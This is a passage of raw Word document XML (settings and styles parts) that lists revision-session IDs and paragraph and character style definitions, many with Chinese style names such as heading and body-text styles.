    <w:rsid w:val="00CE4B44"/>
    <w:rsid w:val="00CE7E7E"/>
    <w:rsid w:val="00CF070A"/>
    <w:rsid w:val="00CF19FF"/>
    <w:rsid w:val="00CF503C"/>
    <w:rsid w:val="00CF62FC"/>
    <w:rsid w:val="00D0054A"/>
    <w:rsid w:val="00D0104D"/>
    <w:rsid w:val="00D0256F"/>
    <w:rsid w:val="00D046D8"/>
    <w:rsid w:val="00D11905"/>
    <w:rsid w:val="00D12437"/>
    <w:rsid w:val="00D12B3A"/>
    <w:rsid w:val="00D13759"/>
    <w:rsid w:val="00D17BBB"/>
    <w:rsid w:val="00D20F3A"/>
    <w:rsid w:val="00D21D93"/>
    <w:rsid w:val="00D22372"/>
    <w:rsid w:val="00D2263B"/>
    <w:rsid w:val="00D2280C"/>
    <w:rsid w:val="00D27283"/>
    <w:rsid w:val="00D27476"/>
    <w:rsid w:val="00D30678"/>
    <w:rsid w:val="00D30ACC"/>
    <w:rsid w:val="00D32A53"/>
    <w:rsid w:val="00D35BB5"/>
    <w:rsid w:val="00D36B01"/>
    <w:rsid w:val="00D40194"/>
    <w:rsid w:val="00D40C77"/>
    <w:rsid w:val="00D41131"/>
    <w:rsid w:val="00D4148E"/>
    <w:rsid w:val="00D427C0"/>
    <w:rsid w:val="00D42F61"/>
    <w:rsid w:val="00D449B6"/>
    <w:rsid w:val="00D45732"/>
    <w:rsid w:val="00D5111C"/>
    <w:rsid w:val="00D5158C"/>
    <w:rsid w:val="00D51994"/>
    <w:rsid w:val="00D53054"/>
    <w:rsid w:val="00D56116"/>
    <w:rsid w:val="00D5635A"/>
    <w:rsid w:val="00D602B9"/>
    <w:rsid w:val="00D67F39"/>
    <w:rsid w:val="00D71CCE"/>
    <w:rsid w:val="00D722B9"/>
    <w:rsid w:val="00D72682"/>
    <w:rsid w:val="00D774A9"/>
    <w:rsid w:val="00D77F92"/>
    <w:rsid w:val="00D80BE3"/>
    <w:rsid w:val="00D86045"/>
    <w:rsid w:val="00D86CDB"/>
    <w:rsid w:val="00D87561"/>
    <w:rsid w:val="00D87CA6"/>
    <w:rsid w:val="00D87DE9"/>
    <w:rsid w:val="00D9206F"/>
    <w:rsid w:val="00D94AAD"/>
    <w:rsid w:val="00D95807"/>
    <w:rsid w:val="00D9603F"/>
    <w:rsid w:val="00D96383"/>
    <w:rsid w:val="00DA45BE"/>
    <w:rsid w:val="00DA484E"/>
    <w:rsid w:val="00DA6861"/>
    <w:rsid w:val="00DB15D0"/>
    <w:rsid w:val="00DB2B5B"/>
    <w:rsid w:val="00DB3820"/>
    <w:rsid w:val="00DB401F"/>
    <w:rsid w:val="00DB408D"/>
    <w:rsid w:val="00DB41DC"/>
    <w:rsid w:val="00DB5444"/>
    <w:rsid w:val="00DB5780"/>
    <w:rsid w:val="00DB7673"/>
    <w:rsid w:val="00DB77E6"/>
    <w:rsid w:val="00DC5CC8"/>
    <w:rsid w:val="00DD147B"/>
    <w:rsid w:val="00DD1974"/>
    <w:rsid w:val="00DD233C"/>
    <w:rsid w:val="00DD2C6E"/>
    <w:rsid w:val="00DD30AD"/>
    <w:rsid w:val="00DD356E"/>
    <w:rsid w:val="00DD35C1"/>
    <w:rsid w:val="00DD39AA"/>
    <w:rsid w:val="00DD3DF4"/>
    <w:rsid w:val="00DD6E49"/>
    <w:rsid w:val="00DD73F9"/>
    <w:rsid w:val="00DE128E"/>
    <w:rsid w:val="00DE1444"/>
    <w:rsid w:val="00DE6542"/>
    <w:rsid w:val="00DE6A16"/>
    <w:rsid w:val="00DF5CF4"/>
    <w:rsid w:val="00DF5E36"/>
    <w:rsid w:val="00DF76E7"/>
    <w:rsid w:val="00E06C77"/>
    <w:rsid w:val="00E06CEB"/>
    <w:rsid w:val="00E116D5"/>
    <w:rsid w:val="00E14E0C"/>
    <w:rsid w:val="00E21A21"/>
    <w:rsid w:val="00E23379"/>
    <w:rsid w:val="00E25086"/>
    <w:rsid w:val="00E26323"/>
    <w:rsid w:val="00E329F9"/>
    <w:rsid w:val="00E34B14"/>
    <w:rsid w:val="00E37410"/>
    <w:rsid w:val="00E4046A"/>
    <w:rsid w:val="00E40AF3"/>
    <w:rsid w:val="00E40BC0"/>
    <w:rsid w:val="00E43717"/>
    <w:rsid w:val="00E437BE"/>
    <w:rsid w:val="00E44CA0"/>
    <w:rsid w:val="00E47B20"/>
    <w:rsid w:val="00E517E8"/>
    <w:rsid w:val="00E51A67"/>
    <w:rsid w:val="00E51B5D"/>
    <w:rsid w:val="00E52B38"/>
    <w:rsid w:val="00E559DF"/>
    <w:rsid w:val="00E601EA"/>
    <w:rsid w:val="00E60C74"/>
    <w:rsid w:val="00E611B7"/>
    <w:rsid w:val="00E63411"/>
    <w:rsid w:val="00E65510"/>
    <w:rsid w:val="00E65874"/>
    <w:rsid w:val="00E707CB"/>
    <w:rsid w:val="00E72EB9"/>
    <w:rsid w:val="00E75266"/>
    <w:rsid w:val="00E7575C"/>
    <w:rsid w:val="00E7666E"/>
    <w:rsid w:val="00E7683A"/>
    <w:rsid w:val="00E77B00"/>
    <w:rsid w:val="00E81816"/>
    <w:rsid w:val="00E8494F"/>
    <w:rsid w:val="00E859CF"/>
    <w:rsid w:val="00E8659B"/>
    <w:rsid w:val="00E8660D"/>
    <w:rsid w:val="00E90E00"/>
    <w:rsid w:val="00E92505"/>
    <w:rsid w:val="00E943D3"/>
    <w:rsid w:val="00E94B36"/>
    <w:rsid w:val="00E95442"/>
    <w:rsid w:val="00E96215"/>
    <w:rsid w:val="00E96FCE"/>
    <w:rsid w:val="00E97021"/>
    <w:rsid w:val="00EA0AF8"/>
    <w:rsid w:val="00EA0CB7"/>
    <w:rsid w:val="00EA12E1"/>
    <w:rsid w:val="00EA1767"/>
    <w:rsid w:val="00EA6E7E"/>
    <w:rsid w:val="00EA7006"/>
    <w:rsid w:val="00EA7037"/>
    <w:rsid w:val="00EA77CB"/>
    <w:rsid w:val="00EB10F3"/>
    <w:rsid w:val="00EB35FF"/>
    <w:rsid w:val="00EB68E2"/>
    <w:rsid w:val="00EB716B"/>
    <w:rsid w:val="00EC0D23"/>
    <w:rsid w:val="00EC0E57"/>
    <w:rsid w:val="00EC12D3"/>
    <w:rsid w:val="00EC4108"/>
    <w:rsid w:val="00EC6152"/>
    <w:rsid w:val="00EC63B9"/>
    <w:rsid w:val="00EC6ADD"/>
    <w:rsid w:val="00EC747B"/>
    <w:rsid w:val="00EC7931"/>
    <w:rsid w:val="00ED09D7"/>
    <w:rsid w:val="00ED247D"/>
    <w:rsid w:val="00ED5B77"/>
    <w:rsid w:val="00ED7347"/>
    <w:rsid w:val="00EE09EE"/>
    <w:rsid w:val="00EE2FAD"/>
    <w:rsid w:val="00EE5F19"/>
    <w:rsid w:val="00EF0B8E"/>
    <w:rsid w:val="00EF14BF"/>
    <w:rsid w:val="00EF2040"/>
    <w:rsid w:val="00EF6F46"/>
    <w:rsid w:val="00F04235"/>
    <w:rsid w:val="00F063DC"/>
    <w:rsid w:val="00F12936"/>
    <w:rsid w:val="00F130CA"/>
    <w:rsid w:val="00F13D9B"/>
    <w:rsid w:val="00F140A9"/>
    <w:rsid w:val="00F22979"/>
    <w:rsid w:val="00F23308"/>
    <w:rsid w:val="00F258BB"/>
    <w:rsid w:val="00F32A08"/>
    <w:rsid w:val="00F32E33"/>
    <w:rsid w:val="00F35318"/>
    <w:rsid w:val="00F35E99"/>
    <w:rsid w:val="00F36084"/>
    <w:rsid w:val="00F36B05"/>
    <w:rsid w:val="00F36D1A"/>
    <w:rsid w:val="00F435EB"/>
    <w:rsid w:val="00F50193"/>
    <w:rsid w:val="00F50C64"/>
    <w:rsid w:val="00F50D73"/>
    <w:rsid w:val="00F50DC8"/>
    <w:rsid w:val="00F535BA"/>
    <w:rsid w:val="00F54C83"/>
    <w:rsid w:val="00F6008E"/>
    <w:rsid w:val="00F62433"/>
    <w:rsid w:val="00F6253E"/>
    <w:rsid w:val="00F6382A"/>
    <w:rsid w:val="00F64D64"/>
    <w:rsid w:val="00F70CB2"/>
    <w:rsid w:val="00F72127"/>
    <w:rsid w:val="00F72F79"/>
    <w:rsid w:val="00F76557"/>
    <w:rsid w:val="00F76F2C"/>
    <w:rsid w:val="00F803E9"/>
    <w:rsid w:val="00F817B1"/>
    <w:rsid w:val="00F82DD8"/>
    <w:rsid w:val="00F83C0E"/>
    <w:rsid w:val="00F860DE"/>
    <w:rsid w:val="00F91A92"/>
    <w:rsid w:val="00F944D8"/>
    <w:rsid w:val="00F9497B"/>
    <w:rsid w:val="00F95B93"/>
    <w:rsid w:val="00F96308"/>
    <w:rsid w:val="00F97931"/>
    <w:rsid w:val="00F97F29"/>
    <w:rsid w:val="00FA0B2B"/>
    <w:rsid w:val="00FA10FA"/>
    <w:rsid w:val="00FA5AEC"/>
    <w:rsid w:val="00FA5EC7"/>
    <w:rsid w:val="00FB142A"/>
    <w:rsid w:val="00FB2202"/>
    <w:rsid w:val="00FB25A7"/>
    <w:rsid w:val="00FB421A"/>
    <w:rsid w:val="00FC0A32"/>
    <w:rsid w:val="00FC0C56"/>
    <w:rsid w:val="00FC3F6B"/>
    <w:rsid w:val="00FC4BCF"/>
    <w:rsid w:val="00FC6272"/>
    <w:rsid w:val="00FC7B7F"/>
    <w:rsid w:val="00FE0439"/>
    <w:rsid w:val="00FE0AC6"/>
    <w:rsid w:val="00FE242E"/>
    <w:rsid w:val="00FE444D"/>
    <w:rsid w:val="00FF3652"/>
    <w:rsid w:val="00FF395D"/>
    <w:rsid w:val="00FF5263"/>
    <w:rsid w:val="00FF674B"/>
    <w:rsid w:val="00FF7F59"/>
    <w:rsid w:val="07F17482"/>
    <w:rsid w:val="0D3008D4"/>
    <w:rsid w:val="0EB75826"/>
    <w:rsid w:val="0EEE10D6"/>
    <w:rsid w:val="1A9D9A25"/>
    <w:rsid w:val="1B8F6024"/>
    <w:rsid w:val="1C6F8FB6"/>
    <w:rsid w:val="1DC67833"/>
    <w:rsid w:val="1E256838"/>
    <w:rsid w:val="1E3E8557"/>
    <w:rsid w:val="21FEEBA7"/>
    <w:rsid w:val="237C3495"/>
    <w:rsid w:val="263962C5"/>
    <w:rsid w:val="2A7E213D"/>
    <w:rsid w:val="2A805C61"/>
    <w:rsid w:val="2B196BEE"/>
    <w:rsid w:val="2BF727F8"/>
    <w:rsid w:val="2DFF23E7"/>
    <w:rsid w:val="2EF76E24"/>
    <w:rsid w:val="31F2704E"/>
    <w:rsid w:val="36387AA2"/>
    <w:rsid w:val="37AFDCC1"/>
    <w:rsid w:val="37B74625"/>
    <w:rsid w:val="39775EAB"/>
    <w:rsid w:val="3BFAEA96"/>
    <w:rsid w:val="3C37BC5C"/>
    <w:rsid w:val="3C7E32A8"/>
    <w:rsid w:val="3D3FC69F"/>
    <w:rsid w:val="3E75EBA7"/>
    <w:rsid w:val="3EB77754"/>
    <w:rsid w:val="3FF74D23"/>
    <w:rsid w:val="3FFFC8D5"/>
    <w:rsid w:val="406962F6"/>
    <w:rsid w:val="430B3244"/>
    <w:rsid w:val="436B3B44"/>
    <w:rsid w:val="46FF9663"/>
    <w:rsid w:val="4A1933D4"/>
    <w:rsid w:val="4E5F3705"/>
    <w:rsid w:val="53680D92"/>
    <w:rsid w:val="53A841E6"/>
    <w:rsid w:val="53FC4FDD"/>
    <w:rsid w:val="578A0A11"/>
    <w:rsid w:val="57F3F7F1"/>
    <w:rsid w:val="59CD592E"/>
    <w:rsid w:val="5F7DAF85"/>
    <w:rsid w:val="5FA345E7"/>
    <w:rsid w:val="5FFF1821"/>
    <w:rsid w:val="62350D34"/>
    <w:rsid w:val="667DA013"/>
    <w:rsid w:val="670F2E62"/>
    <w:rsid w:val="68C02C47"/>
    <w:rsid w:val="6A7E5D2C"/>
    <w:rsid w:val="6AD759D5"/>
    <w:rsid w:val="6BBEA9BA"/>
    <w:rsid w:val="6DA488CD"/>
    <w:rsid w:val="6DDE6A17"/>
    <w:rsid w:val="6E9E8133"/>
    <w:rsid w:val="6F7DEC95"/>
    <w:rsid w:val="6F7E27C1"/>
    <w:rsid w:val="72E7BB0C"/>
    <w:rsid w:val="72ED3D8C"/>
    <w:rsid w:val="74A016C3"/>
    <w:rsid w:val="75901B5B"/>
    <w:rsid w:val="75FF18D9"/>
    <w:rsid w:val="77BBDA4E"/>
    <w:rsid w:val="77EB65F3"/>
    <w:rsid w:val="797F0FC3"/>
    <w:rsid w:val="7B431E4D"/>
    <w:rsid w:val="7B723F3F"/>
    <w:rsid w:val="7B9DE028"/>
    <w:rsid w:val="7BDECFFA"/>
    <w:rsid w:val="7BF85F76"/>
    <w:rsid w:val="7CDFFCB7"/>
    <w:rsid w:val="7D36D961"/>
    <w:rsid w:val="7D72C608"/>
    <w:rsid w:val="7DE724FA"/>
    <w:rsid w:val="7DE75FE2"/>
    <w:rsid w:val="7DEE754C"/>
    <w:rsid w:val="7E1E187B"/>
    <w:rsid w:val="7E3F0047"/>
    <w:rsid w:val="7EDF9C25"/>
    <w:rsid w:val="7F1EB98E"/>
    <w:rsid w:val="7F9832F5"/>
    <w:rsid w:val="7FA53127"/>
    <w:rsid w:val="7FBE82B9"/>
    <w:rsid w:val="7FBF6882"/>
    <w:rsid w:val="7FF2D5AC"/>
    <w:rsid w:val="7FF5137F"/>
    <w:rsid w:val="7FFE94E7"/>
    <w:rsid w:val="7FFF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B3D320"/>
  <w15:docId w15:val="{2319D176-D58B-4FDE-B5C4-5BB7EC977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0"/>
    <w:next w:val="a0"/>
    <w:link w:val="11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1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Indent"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:afterLines="50" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a0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0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0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Body Text 2"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="23"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="120" w:line="480" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af0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Title"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:link w:val="af2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f3">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="a8"/>
    <w:next w:val="a8"/>
    <w:link w:val="af4"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="af5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1"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af7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">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af8">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="12">
    <w:name w:val="列表段落1"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="标题 4 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat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basedOn w:val="a1"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="80">
    <w:name w:val="标题 8 字符"/>
    <w:basedOn w:val="a1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0">
    <w:name w:val="标题 9 字符"/>
    <w:basedOn w:val="a1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af2">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af1"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="13">
    <w:name w:val="无间隔1"/>
    <w:uiPriority w:val="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customStyle="1" w:styleId="af">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="ae"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/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qFormat/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a7">
    <w:name w:val="文档结构图 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="20">
    <w:name w:val="项目符号2"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="110">
    <w:name w:val="样式11"/>
    <w:basedOn w:val="12"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="44">
    <w:name w:val="样式44"/>
    <w:basedOn w:val="20"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="34Char">
    <w:name w:val="样式34 Char"/>
    <w:link w:val="34"/>
    <w:qFormat/>
    <w:locked/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="34">
    <w:name w:val="样式34"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="34Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="480"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="074">
    <w:name w:val="样式 首行缩进:  0.74 厘米"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="074Char"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="074Char">
    <w:name w:val="样式 首行缩进:  0.74 厘米 Char"/>
    <w:link w:val="074"/>
    <w:qFormat/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23">
    <w:name w:val="正文文本 2 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="22"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ab">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font1">
    <w:name w:val="font1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font5">
    <w:name w:val="font5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font6">
    <w:name w:val="font6"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font7">
    <w:name w:val="font7"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font8">
    <w:name w:val="font8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font9">
    <w:name w:val="font9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font10">
    <w:name w:val="font10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font11">
    <w:name w:val="font11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font12">
    <w:name w:val="font12"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font13">
    <w:name w:val="font13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font14">
    <w:name w:val="font14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79">
    <w:name w:val="xl79"/>
    <w:basedOn w:val="a0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kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl80">
    <w:name w:val="xl80"/>
    <w:basedOn w:val="a0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kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl81">
    <w:name w:val="xl81"/>
    <w:basedOn w:val="a0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kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl82">
    <w:name w:val="xl82"/>
    <w:basedOn w:val="a0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kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl83">
    <w:name w:val="xl83"/>
    <w:basedOn w:val="a0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Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl84">
    <w:name w:val="xl84"/>
    <w:basedOn w:val="a0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Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl85">
    <w:name w:val="xl85"/>
    <w:basedOn w:val="a0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kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl86">
    <w:name w:val="xl86"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl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xl87">
    <w:name w:val="xl87"/>
    <w:basedOn w:val="a0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kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="xl88">
    <w:name w:val="xl88"/>
    <w:basedOn w:val="a0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kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a5">
    <w:name w:val="正文缩进 字符"/>
    <w:link w:val="a4"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a">
    <w:name w:val="第二"/>
    <w:basedOn w:val="2"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="360"/>
        <w:tab w:val="left" w:pos="1440"/>
      </w:tabs>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Arial"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="10">
    <w:name w:val="第1"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="360"/>
      </w:tabs>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="NERCIS-">
    <w:name w:val="NERCIS-三级标题"/>
    <w:basedOn w:val="3"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
